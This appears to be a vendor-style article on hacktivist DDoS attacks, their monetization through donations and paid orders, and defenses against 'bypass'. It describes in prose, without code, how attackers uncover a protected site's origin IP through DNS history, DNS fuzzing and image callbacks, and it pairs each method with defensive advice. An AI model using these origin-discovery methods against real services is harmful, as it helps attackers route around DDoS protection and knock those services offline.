Attacks by cybercriminals on the websites of US airports, the White House, Anonymous attacks on Russian media websites, DDoS attacks - all this is just a small part of what is happening on the dark web today.
Why do they do it?
At first glance, it may seem that hacktivist attacks are exclusively an expression of social protest by stopping the work of the largest corporations and suppressing various information resources. However, the underlying goal is, of course, financial motivation, and under the guise of organizing such attacks, hacktivists engage in direct deception. In our world, everything revolves around money, and it would be wrong to think that hacktivists are engaged in pure altruism. The organization of any DDoS attack costs a lot of money - even to rent a botnet, you need to pay a large amount.
One of these demonstrative attacks was the attack on the infrastructure of the national health service and the system of "e-health" in Latvia. In part, it was similar to the actions of hacktivists, but then the guys who run a large botnet came into the light, and at this stage, the Latvian healthcare system could not stand it and went out of order for several hours.
How monetization works
Hacktivists use two main ways to make money. The first is donations. Attacks are announced in various social media channels, and a fundraiser is announced to support cyber activists.
Second, the organization of attacks is used as a way of self-promotion. When everyone knows that you are "the first ddoser in the area," they begin to come to you with commercial orders to organize attacks.
What is the damage?
No matter how loud all the ongoing attacks sound, in reality, hacktivists are not capable of doing much in terms of harming a business. As a rule, all the attacks they organize come down to basic level DDoS, which everyone has long learned to deal with, especially over the past six months.
However, the effect of a well-placed DDoS attack is difficult to overestimate. If you arrange attacks on the largest domain name registrars, electronic signature verification centers, tax authorities, payment systems, medical systems, telemetry solutions, doing it in the “shock and awe” format, there will be a bombshell effect. It will become especially noticeable in geographically large countries such as China, India, if a DDoS attack breaks their national connectivity. Theoretically, such scenarios are quite possible, but practically at the moment, the current level of DDoS is more like attacks by schoolchildren who are trying to demonstrate more than they actually know how.
Bypass in action
Over the past six months, almost everyone has learned how to deal with hacktivist attacks, realized that they need to protect their DNS, mail services, etc.
The task of attackers is to find out the real IP address behind which the portal is located, and bypassing protection against DDoS attacks “pour” malicious traffic there.
Another way that attackers successfully use to organize bypass is DNS fuzzing. People tend to name their services and domain zones in a predictable way, and using this, attackers look for DNS servers with the same name as the attacked resource in an attempt to find "live" services located in the victim's infrastructure.
That is why, when adding and publishing a new service, you need to be careful - the DNS record must immediately point to the IP address of the protection provider, or when setting for protection, the server IP must be changed, excluding the use of the highlighted one, which will be found in the DNS cache and history. Periodic audit of the domain zone to see where the records "look" will also help to avoid such troubles.
Another example is any services where there is a call back from the infrastructure of the protected client. These can be two-way protocols or downloadable pictures - the attacker sends an object that includes the picture, and the infrastructure calls to download it. Thus, the IP address of the victim is revealed.
Who is to blame and what to do?
Ultimately, bypass is an attempt to find ways to bypass the protection provider and pierce the resource directly. As described above, this is solved in different ways, but if the business defended itself well and “cleaned up” all the ends, then there is nothing to be afraid of.
And if there are bare ends sticking out or a business needs to be extra confident in the continuous operation of its service, in this case it is possible to organize a dedicated protection channel from the supplier's edge to the client infrastructure. And even if the main channel was “punched through” to the client, which for one reason or another was not completely closed, communication goes through a dedicated one, and the business remains online 24/7.
Bypass prevention is a task that the security provider always solves together with the client. In addition, this is a regular task with constantly changing inputs. Any new microservice in the client's infrastructure that is published to the Web, any issued encryption certificate, a record in a domain zone, a file uploaded for download - have the potential to reveal an entry point to a hacker.
Summing up, we can say that, in general, bypass is not as terrible as it is painted. For a protection provider, this is an additional challenge, and the more attacks the antiDDoS system neutralizes, the more opportunities it gets to learn from them, and the less likely it is to bypass the protected client.